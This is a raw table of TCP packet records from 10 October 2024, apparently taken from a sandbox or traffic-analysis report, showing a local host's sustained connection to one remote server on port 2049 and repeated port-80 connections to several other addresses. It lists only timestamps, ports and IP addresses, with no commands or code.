                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642003059 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642025948 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642040014 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642045021 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642056942 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642069101 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642081022 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642092943 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642106056 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642128944 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642141104 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642153978 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642165899 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642178059 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642189980 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642206907 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642219067 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642230988 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.642242908 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646404982 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646493912 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646505117 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646564960 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646578074 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646593094 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646606922 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646677971 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646681070 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646689892 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646760941 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646779060 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646786928 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646831036 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646855116 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.646878958 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647088051 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647113085 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647188902 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647212982 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647357941 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647402048 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647428989 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647452116 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647475958 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647499084 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647552013 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647577047 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647602081 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647625923 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647650003 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647675037 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647699118 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647722960 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647768974 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647794008 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647818089 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647842884 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647866964 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647891998 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647916079 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647941113 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647965908 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.647989988 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648014069 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648037910 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648061991 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648085117 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648108006 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648132086 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648154974 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648179054 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648201942 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648245096 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.648268938 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652393103 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652420044 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652446032 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652493000 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652518034 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652543068 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652566910 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652610064 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652635098 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652695894 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.652827978 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.699410915 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.699652910 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:48.738115072 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:50.214129925 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:50.217086077 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:50.222078085 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:51.535479069 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:51.539037943 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:51.544070959 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:52.803468943 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:52.850905895 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:52.855689049 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.845561981 CEST804973582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.845644951 CEST4973580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.845726013 CEST4973580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.850513935 CEST804973582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.905148029 CEST4986980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.910003901 CEST804986982.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.912164927 CEST4986980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.912334919 CEST4986980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.912357092 CEST4986980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.917085886 CEST804986982.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.917433977 CEST804986982.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.919425964 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.961087942 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.012883902 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017774105 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017787933 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017802954 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017812014 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017848969 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017857075 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017916918 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017944098 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017987967 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.017996073 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018003941 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018013000 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018054008 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018100023 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018107891 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:55.018125057 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:56.867413998 CEST4986980192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.009618044 CEST4988280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014600039 CEST804988282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014683008 CEST4988280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014811993 CEST4988280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014832020 CEST4988280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.019658089 CEST804988282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.019773960 CEST804988282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.470506907 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.473457098 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.478228092 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:00.032120943 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:00.032541990 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:00.037659883 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:00.883065939 CEST4988280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:00.934556961 CEST4990580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.008068085 CEST804977182.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.008157969 CEST4977180192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.008202076 CEST4977180192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009560108 CEST804990582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009783030 CEST4990580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009949923 CEST4990580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009949923 CEST4990580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.013068914 CEST804977182.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.014770985 CEST804990582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.014787912 CEST804990582.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.036082029 CEST4990680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.040931940 CEST804990682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.041970968 CEST4990680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.041970968 CEST4990680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.041970968 CEST4990680192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.047159910 CEST804990682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.047173977 CEST804990682.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:03.369575977 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:03.371412039 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:03.376375914 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.867419958 CEST4990580192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.975899935 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.980942965 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.981491089 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.983599901 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.983599901 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.988503933 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.988522053 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:05.368321896 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:05.405349016 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.318619013 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.318640947 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.320498943 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.320957899 CEST4992980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.325845957 CEST804992947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.538477898 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.543489933 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.546061039 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.546219110 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.546253920 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.551071882 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.551103115 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.906459093 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.906625032 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.906644106 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.906698942 CEST4994280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.911427021 CEST804994213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.184336901 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.189151049 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.189829111 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.193072081 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.193104029 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.197880983 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.197906017 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.680147886 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.680960894 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.681027889 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.938473940 CEST4995480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.943331003 CEST804995444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.639532089 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644339085 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644488096 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644643068 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644656897 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.649585009 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.649600029 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.993830919 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.993861914 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.993920088 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.994004965 CEST4996080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.999305010 CEST804996018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.202455044 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.207309961 CEST8049972172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.208271027 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.208393097 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.208430052 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.213126898 CEST8049972172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.213160038 CEST8049972172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.700448990 CEST8049972172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.700517893 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.707264900 CEST4997280192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.712039948 CEST8049972172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.960303068 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965272903 CEST8049978172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965603113 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965732098 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965732098 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.970587969 CEST8049978172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.970601082 CEST8049978172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.461947918 CEST8049978172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.462008953 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.462624073 CEST4997880192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.467407942 CEST8049978172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.750140905 CEST4998480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755125046 CEST804998434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755203962 CEST4998480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755316973 CEST4998480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755337954 CEST4998480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.760476112 CEST804998434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.760490894 CEST804998434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.868915081 CEST4998480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.897891998 CEST4998580192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.902887106 CEST804998534.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.902973890 CEST4998580192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.903084993 CEST4998580192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.903117895 CEST4998580192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.915649891 CEST804998534.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.916080952 CEST804998534.246.200.160192.168.2.5
